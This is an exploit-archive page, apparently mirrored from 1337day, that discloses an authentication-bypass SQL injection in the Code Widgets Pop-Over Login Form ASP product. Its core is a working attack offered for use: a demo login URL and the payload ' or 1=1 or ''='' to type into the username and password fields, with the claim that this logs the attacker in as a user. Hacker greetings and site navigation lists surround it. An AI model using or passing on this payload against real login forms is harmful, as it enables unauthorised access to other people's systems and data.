Code Widgets Pop-Over Login Form SQL Injection

Code Widgets Pop-Over Login Form SQL Injection: Posted Aug 16, 2011; Authored by L0rd CrusAd3r; Code Widgets Pop-Over Login Form suffers from a remote SQL injection vulnerability that allows for authentication bypass.; tags | exploit, remote, sql injection; SHA-256 | bdbf462c572d42d18b0dbe4c745bb4ef7bf3a9d17183ba7556dd3c0e21d31c13; Download | Favorite | View

Code Widgets Pop-Over Login Form SQL Injection

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            :  1337day.com                                  0
1                     inj3ct0r 1337 Day Team                           1
0                                                                      0
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title: Code Widget Pop-Over Login Form (ASP) Authentication Bypass Vulnerability
Vendor url: http://www.comriesoftware.net/codewidgets/product.aspx?key=122
Published: 17-August-2011
Greetz to:r0073r (1337day.com), r4dc0re, Sid3^effects,See Me, Awesomeness, Sonic Bluehat.
Special Greetz: inj3ct0r Team
Shoutzz:- To all My hacker friends

Price:10$  PS: This is not the cost of the Exploit but Cost of the Product..Information for n00bs alone 

~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*
Description:

Complete Web File
Login form pops up over page content, user is verified using a database. Includes all source code, demo and database file.


~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*

Vulnerability:

*Authentication Bypass Vulnerability 

DEMO URL: http://www.codewidgets.net/CS0122/login.asp

Attack Patern : ' or 1=1 or ''=''

Use for Username and Password

You got Logged in as a USER

# 0day n0 m0re #
# L0rd CrusAd3r #

Top Authors In Last 30 Days

Red Hat 233 files
Ubuntu 70 files
indoushka 44 files
LiquidWorm 28 files
Debian 22 files
Apple 9 files
Google Security Research 8 files
Emiliano Febbi 4 files
Seth Jenkins 4 files
nu11secur1ty 3 files

File Archives

Systems

AIX (430)
Apple (2,125)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,152)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,727)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,169)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,955)
UNIX (9,472)
UnixWare (188)
Windows (6,784)
Other

Code Widgets Pop-Over Login Form SQL Injection

Code Widgets Pop-Over Login Form SQL Injection

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Code Widgets Pop-Over Login Form SQL Injection

Share This

Code Widgets Pop-Over Login Form SQL Injection

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems